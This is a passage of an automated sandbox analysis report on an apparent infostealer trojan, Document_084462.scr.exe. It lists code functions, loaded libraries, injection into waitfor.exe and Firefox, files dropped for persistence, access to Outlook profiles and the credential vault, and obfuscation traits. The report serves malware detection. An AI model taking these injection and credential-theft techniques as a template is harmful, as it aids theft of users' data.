            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB0C121_2_37AB0C12
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B7EC601_2_37B7EC60
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B76C691_2_37B76C69
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B6EC4C1_2_37B6EC4C
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B34BC01_2_37B34BC0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AC0B101_2_37AC0B10
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B7CA131_2_37B7CA13
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B7EA5B1_2_37B7EA5B
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ABE9A01_2_37ABE9A0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B7E9A61_2_37B7E9A6
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD68821_2_37AD6882
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AC28C01_2_37AC28C0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B608351_2_37B60835
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AEE8101_2_37AEE810
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AA68681_2_37AA6868
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_0012E3541_2_0012E354
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_0012E4751_2_0012E475
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_0012E80C1_2_0012E80C
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_0012D8D81_2_0012D8D8
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 2_2_034F13542_2_034F1354
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 2_2_034F14752_2_034F1475
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 2_2_034F180C2_2_034F180C
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 2_2_034F08D82_2_034F08D8
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A804453_2_04A80445
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B4A5263_2_04B4A526
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A806803_2_04A80680
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A7C6E03_2_04A7C6E0
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B3A6C03_2_04B3A6C0
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A9C6003_2_04A9C600
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AA46703_2_04AA4670
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A8A7603_2_04A8A760
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A827603_2_04A82760
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B367573_2_04B36757
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A700A03_2_04A700A0
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B2E0763_2_04B2E076
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B4010E3_2_04B4010E
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A8E3103_2_04A8E310
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B4ACEB3_2_04B4ACEB
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A98CDF3_2_04A98CDF
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A8AC203_2_04A8AC20
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AFEC203_2_04AFEC20
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A70C123_2_04A70C12
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B3EC603_2_04B3EC60
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B36C693_2_04B36C69
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B2EC4C3_2_04B2EC4C
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A92DB03_2_04A92DB0
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A7AD003_2_04A7AD00
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A80D693_2_04A80D69
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B30EAD3_2_04B30EAD
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A72EE83_2_04A72EE8
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B20E6D3_2_04B20E6D
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AC2E483_2_04AC2E48
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AA0E503_2_04AA0E50
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B3EFBF3_2_04B3EFBF
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A86FE03_2_04A86FE0
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A8CF003_2_04A8CF00
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A968823_2_04A96882
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B1C89F3_2_04B1C89F
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A828C03_2_04A828C0
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B208353_2_04B20835
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AAE8103_2_04AAE810
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A668683_2_04A66868
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A7E9A03_2_04A7E9A0
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B3E9A63_2_04B3E9A6
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B22AC03_2_04B22AC0
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B3CA133_2_04B3CA13
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B3EA5B3_2_04B3EA5B
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AF4BC03_2_04AF4BC0
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A80B103_2_04A80B10
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B154903_2_04B15490
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AED4803_2_04AED480
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B375C63_2_04B375C6
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B3F5C93_2_04B3F5C9
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AF36EC3_2_04AF36EC
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B3F6F63_2_04B3F6F6
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B216233_2_04B21623
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B1D62C3_2_04B1D62C
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B2D6463_2_04B2D646
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AB508C3_2_04AB508C
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B370F13_2_04B370F1
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A8B0D03_2_04A8B0D0
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A9B1E03_2_04A9B1E0
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A851C03_2_04A851C0
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B1D1303_2_04B1D130
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A6F1133_2_04A6F113
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AC717A3_2_04AC717A
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A6D2EC3_2_04A6D2EC
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B3124C3_2_04B3124C
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A713803_2_04A71380
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B3F3303_2_04B3F330
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B19C983_2_04B19C98
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A9FCE03_2_04A9FCE0
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B07CE83_2_04B07CE8
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A83C603_2_04A83C60
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B1FDF43_2_04B1FDF4
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A89DD03_2_04A89DD0
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B3FD273_2_04B3FD27
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B37D4C3_2_04B37D4C
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A81EB23_2_04A81EB2
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B39ED23_2_04B39ED2
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B23FA03_2_04B23FA0
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B31FC63_2_04B31FC6
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B3FF633_2_04B3FF63
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AFFF403_2_04AFFF40
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AF98B23_2_04AF98B2
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B378F33_2_04B378F3
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B318DA3_2_04B318DA
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A838003_2_04A83800
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B3F8723_2_04B3F872
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A898703_2_04A89870
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A9B8703_2_04A9B870
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AF58703_2_04AF5870
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AC59C03_2_04AC59C0
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A9FAA03_2_04A9FAA0
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B3FA893_2_04B3FA89
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B11B803_2_04B11B80
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B3FB2E3_2_04B3FB2E
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04ABDB193_2_04ABDB19
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04D9F0383_2_04D9F038
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04D9E4753_2_04D9E475
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04D9E3543_2_04D9E354
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04D9D8D83_2_04D9D8D8
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04D9E80C3_2_04D9E80C
            Source: Document_084462.scr.exe, 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs Document_084462.scr.exe
            Source: Document_084462.scr.exe, 00000001.00000002.13294981161.000000000776D000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamewaitfor.exej% vs Document_084462.scr.exe
            Source: Document_084462.scr.exe, 00000001.00000003.13193869050.0000000037A02000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs Document_084462.scr.exe
            Source: Document_084462.scr.exe, 00000001.00000003.13190425343.0000000037848000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs Document_084462.scr.exe
            Source: Document_084462.scr.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engine, Classification label: mal100.troj.spyw.evad.winEXE@7/6@19/15
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Code function: 0_2_004034A2 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Code function: 0_2_00404835 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Code function: 0_2_004021A2 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, File created: C:\Users\user\AppData\Local\Temp\nsuE262.tmp
            Source: Document_084462.scr.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: Document_084462.scr.exe, ReversingLabs: Detection: 34%
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, File read: C:\Users\user\Desktop\Document_084462.scr.exe
            Source: unknown, Process created: C:\Users\user\Desktop\Document_084462.scr.exe "C:\Users\user\Desktop\Document_084462.scr.exe"
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Process created: C:\Users\user\Desktop\Document_084462.scr.exe "C:\Users\user\Desktop\Document_084462.scr.exe"
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe, Process created: C:\Windows\SysWOW64\waitfor.exe "C:\Windows\SysWOW64\waitfor.exe"
            Source: C:\Windows\SysWOW64\waitfor.exe, Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: edgegdi.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: dwmapi.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: oleacc.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: ntmarta.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: version.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: shfolder.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: riched20.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: usp10.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: msls31.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: textinputframework.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: coreuicomponents.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: textshaping.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: msi.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: powrprof.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: wkscli.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: edgegdi.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: umpdc.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: msi.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: winnsi.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: schannel.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: mskeyprotect.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: ntasn1.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: dpapi.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: ncrypt.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Section loaded: ncryptsslp.dll
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe, Section loaded: mswsock.dll
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe, Section loaded: dnsapi.dll
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe, Section loaded: iphlpapi.dll
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe, Section loaded: fwpuclnt.dll
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe, Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\waitfor.exe, Section loaded: mpr.dll
            Source: C:\Windows\SysWOW64\waitfor.exe, Section loaded: version.dll
            Source: C:\Windows\SysWOW64\waitfor.exe, Section loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\waitfor.exe, Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\waitfor.exe, Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\waitfor.exe, Section loaded: edgegdi.dll
            Source: C:\Windows\SysWOW64\waitfor.exe, Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\waitfor.exe, Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\waitfor.exe, Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\waitfor.exe, Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\waitfor.exe, Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\waitfor.exe, Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\waitfor.exe, Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\waitfor.exe, Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\waitfor.exe, Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\waitfor.exe, Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\waitfor.exe, Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\waitfor.exe, Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\waitfor.exe, Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\waitfor.exe, Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\waitfor.exe, Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\waitfor.exe, Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\waitfor.exe, Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\waitfor.exe, Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\waitfor.exe, Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\waitfor.exe, Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: C:\Windows\SysWOW64\waitfor.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: Document_084462.scr.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: waitfor.pdbGCTL source: Document_084462.scr.exe, 00000001.00000002.13294981161.000000000776D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: waitfor.pdb source: Document_084462.scr.exe, 00000001.00000002.13294981161.000000000776D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: Document_084462.scr.exe, 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Document_084462.scr.exe, Document_084462.scr.exe, 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe

            Data Obfuscation

            Source: Yara match, File source: 00000001.00000002.13274829512.00000000067E0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000000.00000002.12951622773.0000000009B40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Code function: 0_2_700B1B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_700B1B5F
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Code function: 1_2_37A897A1 push es; iretd 1_2_37A897A8
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Code function: 1_2_37A821AD pushad ; retf 0004h 1_2_37A8223F
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Code function: 1_2_37AB08CD push ecx; mov dword ptr [esp], ecx 1_2_37AB08D6
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Code function: 1_2_00125075 push ss; iretd 1_2_00125088
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Code function: 1_2_00135242 push eax; ret 1_2_00135244
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Code function: 1_2_001244B3 push esp; retf 1_2_001244B5
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Code function: 1_2_00124F98 push ss; iretd 1_2_00125088
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe, Code function: 2_2_034E7F98 push ss; iretd 2_2_034E8088
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe, Code function: 2_2_034F8242 push eax; ret 2_2_034F8244
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe, Code function: 2_2_034E9252 pushfd ; retf 2_2_034E925D
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe, Code function: 2_2_034E8075 push ss; iretd 2_2_034E8088
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe, Code function: 2_2_03470008 push edi; ret 2_2_03470009
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe, Code function: 2_2_034E98C4 pushfd ; ret 2_2_034E98E8
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe, Code function: 2_2_034E98A7 pushad ; retf 2_2_034E98A8
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe, Code function: 2_2_034E74B3 push esp; retf 2_2_034E74B5
            Source: C:\Windows\SysWOW64\waitfor.exe, Code function: 3_2_04A708CD push ecx; mov dword ptr [esp], ecx 3_2_04A708D6
            Source: C:\Windows\SysWOW64\waitfor.exe, Code function: 3_2_04D944B3 push esp; retf 3_2_04D944B5
            Source: C:\Windows\SysWOW64\waitfor.exe, Code function: 3_2_04D95075 push ss; iretd 3_2_04D95088
            Source: C:\Windows\SysWOW64\waitfor.exe, Code function: 3_2_04D96252 pushfd ; retf 3_2_04D9625D
            Source: C:\Windows\SysWOW64\waitfor.exe, Code function: 3_2_04DA5242 push eax; ret 3_2_04DA5244
            Source: C:\Windows\SysWOW64\waitfor.exe, Code function: 3_2_04D94F98 push ss; iretd 3_2_04D95088
            Source: C:\Windows\SysWOW64\waitfor.exe, Code function: 3_2_04D968C4 pushfd ; ret 3_2_04D968E8
            Source: C:\Windows\SysWOW64\waitfor.exe, Code function: 3_2_04D968A7 pushad ; retf 3_2_04D968A8
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, File created: C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp\System.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires\Reconsolidates.Ind
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires\Sulfoforbindelserne.chl
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires\Umpiress240.biv
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires\potmaker.sti
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\waitfor.exe, Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\Document_084462.scr.exe, API/Special instruction interceptor: Address: 9D8E19C
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, API/Special instruction interceptor: Address: 6A2E19C
